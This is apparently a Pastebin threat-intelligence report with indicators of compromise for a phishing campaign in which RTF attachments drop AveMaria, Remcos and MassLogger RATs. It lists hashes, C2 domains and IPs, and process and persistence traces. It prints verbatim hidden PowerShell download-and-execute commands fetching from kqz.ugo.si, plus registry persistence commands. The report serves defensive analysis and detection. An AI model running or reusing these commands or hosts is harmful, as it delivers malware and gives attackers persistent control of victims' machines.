Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #avemaria #remcos #RTF #OLE #powershell
- https://pastebin.com/ZYZarB9L
- previous_contact:
- avemaria
- 20/07/20 https://pastebin.com/LV9NKUiy
- 17/02/20 https://pastebin.com/DCPutqaR
- remcos
- 15/07/19 https://pastebin.com/ZxG6eRWM
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
- attack_vector
- --------------
- email > attach .doc (RTF) > OLE > powershell > GET1 exe > %appdata%\svchost.exe > GET2 exe > %appdata%\FIemEnwKf.exe > exfil 37.0.11.114
- email_headers
- --------------
- Received: from gmail.com (unknown [37.0.8.157])
- From: Manager <mitul1.timurnetwork@gmail.com>
- To: user00@victim77.org
- Subject: URGENT: SUPPLY COMPLAIN / DAMAGES
- Date: 12 Jul 2021 02:47:46 -0700
- MIME-Version: 1.0
- files
- --------------
- [RTF1]
- *******
- SHA-256 0366e6f59f94651e2db05a2275584a1fe93f992d937e9666fbec60d78edc6f85
- File name Picture1.doc [ Rich Text Format ]
- File size 662.29 KB (678183 bytes)
- SHA-256 538b973f12e7eb9390b9b64cb36818b73b139bee73af7d5c7b8c5d72a0dc037a
- File name svchost.exe [ .NET executable ] - AveMariaRAT
- File size 465.50 KB (476672 bytes)
- SHA-256 ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13
- File name explorer.exe [ Microsoft Visual C++ ]
- File size 92.00 KB (94208 bytes) - Remcos RAT
- [RTF2]
- *******
- SHA-256 68ebf735d4e141f39519b5906bcd367f49088532e2591f33ed0a1a4a10584d95
- File name Picture2.doc [ Rich Text Format ]
- File size 662.30 KB (678199 bytes)
- SHA-256 b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823
- File name powerpoint.exe [ .NET executable ] - masslogger
- File size 582.50 KB (596480 bytes)
- SHA-256 04cde0c2284cc4dc8f8a5aeadafca6819ab9d11dfb76fb7f3a2fbbf91d3c0e5d
- File name svchost.exe [ .NET executable ]
- File size 684.00 KB (700416 bytes)
- SHA-256 ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13
- File name AFdCieIpH.exe [ Microsoft Visual C++ ]
- File size 92.00 KB (94208 bytes) - Remcos RAT
- activity
- **************
- PL_SCR httP://kqz.ugo.si/svchost.exe [RTF1]
- httP://kqz.ugo.si/powerpoint.exe [RTF2]
- C2 byx.z86.ru 37.0.11.114
- hgoz.12v.si 37.0.11.114
- netwrk
- --------------
- [RTF1]
- *******
- 37.0.11.114 kqz.ugo.si GET /svchost.exe HTTP/1.1 Mozilla/4.0
- 37.0.11.114 kqz.ugo.si GET /svchost.exe HTTP/1.1
- [RTF2]
- *******
- 37.0.11.114 kqz.ugo.si GET /powerpoint.exe HTTP/1.1 Mozilla/4.0
- 37.0.11.114 kqz.ugo.si GET /powerpoint.exe HTTP/1.1
- 37.0.11.114 hgoz.12v.si GET /rem.exe HTTP/1.1 Mozilla/4.0
- comp
- --------------
- [RTF1]
- *******
- WINWORD.EXE 3328 TCP 37.0.11.114 80 ESTABLISHED
- powershell.exe 3828 TCP 37.0.11.114 80 ESTABLISHED
- svchost.exe 1404 TCP 37.0.11.114 5200 ESTABLISHED
- svchost.exe 1404 TCP 37.0.11.114 80 ESTABLISHED
- explorer.exe 2080 TCP 37.0.11.114 2404 ESTABLISHED
- [RTF2]
- *******
- WINWORD.EXE 3836 TCP 37.0.11.114 80 ESTABLISHED
- explorer.exe 3152 TCP 37.0.11.114 2404 ESTABLISHED
- svchost.exe 816 TCP 37.0.11.114 5200 ESTABLISHED
- svchost.exe 816 TCP 37.0.11.114 80 ESTABLISHED
- proc
- --------------
- [RTF1]
- *******
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\operator\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\operator\AppData\Roaming\svchost.exe'"
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- C:\tmp\svchost.exe
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\operator\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\operator\AppData\Roaming\svchost.exe'"
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- C:\tmp\svchost.exe
- C:\tmp\svchost.exe
- C:\Windows\SysWOW64\cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
- C:\Windows\SysWOW64\reg.exe ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
- C:\Users\operator\AppData\Roaming\svchost.exe
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
- C:\tmp\svchost.exe
- C:\Windows\SysWOW64\cmd.exe
- C:\Users\operator\AppData\Roaming\FIemEnwKf.exe
- C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\install.bat" "
- C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
- C:\Users\operator\AppData\Roaming\windows\explorer.exe
- [RTF2]
- *******
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/powerpoint.exe','C:\Users\operator\AppData\Roaming\powerpoint.exe');Start-Process 'C:\Users\operator\AppData\Roaming\powerpoint.exe'"
- C:\Users\operator\AppData\Roaming\powerpoint.exe
- C:\tmp\powerpoint.exe
- C:\tmp\powerpoint.exe
- C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
- C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
- C:\Users\operator\AppData\Roaming\svchost.exe
- C:\tmp\svchost.exe
- C:\tmp\svchost.exe
- C:\Windows\SysWOW64\cmd.exe
- C:\Users\operator\AppData\Roaming\AFdCieIpH.exe
- C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\install.bat" "
- C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
- C:\Users\operator\AppData\Roaming\windows\explorer.exe
- persist
- --------------
- [RTF1]
- *******
- HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load 13.07.2021 10:39
- C:\Users\operator\AppData\Roaming\svchost.exe Firefox Mozilla c:\users\operator\appdata\roaming\svchost.exe 13.07.2021 0:03
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 13.07.2021 10:40
- pdf c:\users\operator\appdata\roaming\windows\explorer.exe 05.01.2017 22:50
- [RTF2]
- *******
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 13.07.2021 10:37
- pdf c:\users\operator\appdata\roaming\windows\explorer.exe 05.01.2017 22:50
- drop
- --------------
- [RTF1]
- *******
- %appdata%\svchost.exe
- %tmp%\svchost.exe
- %appdata%\FIemEnwKf.exe
- %appdata%\windows\explorer.exe
- [RTF2]
- *******
- %appdata%\powerpoint.exe
- %tmp%\powerpoint.exe
- %tmp%\svchost.exe
- %appdata%\AFdCieIpH.exe
- %appdata%\windows\explorer.exe
- # # #
- VT details
- RTF1
- *******
- https://www.virustotal.com/gui/file/0366e6f59f94651e2db05a2275584a1fe93f992d937e9666fbec60d78edc6f85/details
- https://www.virustotal.com/gui/file/538b973f12e7eb9390b9b64cb36818b73b139bee73af7d5c7b8c5d72a0dc037a/details
- https://www.unpac.me/results/b9e19690-4c56-4150-965d-8463b8505682
- https://analyze.intezer.com/analyses/9ef6d317-1ffe-4698-9a0e-9a96e1b7c0dd
- https://www.virustotal.com/gui/file/ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13/details
- https://analyze.intezer.com/analyses/46648e4d-8816-4ba0-bacb-4857ab6d3215
- RTF2
- *******
- https://www.virustotal.com/gui/file/68ebf735d4e141f39519b5906bcd367f49088532e2591f33ed0a1a4a10584d95/details
- https://www.virustotal.com/gui/file/b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823/details
- https://www.unpac.me/results/a2582bf5-9003-4650-bcbc-135f13d6c47c
- https://analyze.intezer.com/analyses/38ba4b0f-e0d8-4791-8fdb-59d31fca75c2
- https://www.virustotal.com/gui/file/ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13/details
- https://analyze.intezer.com/analyses/46648e4d-8816-4ba0-bacb-4857ab6d3215
- VR
Add Comment
Please, Sign In to add comment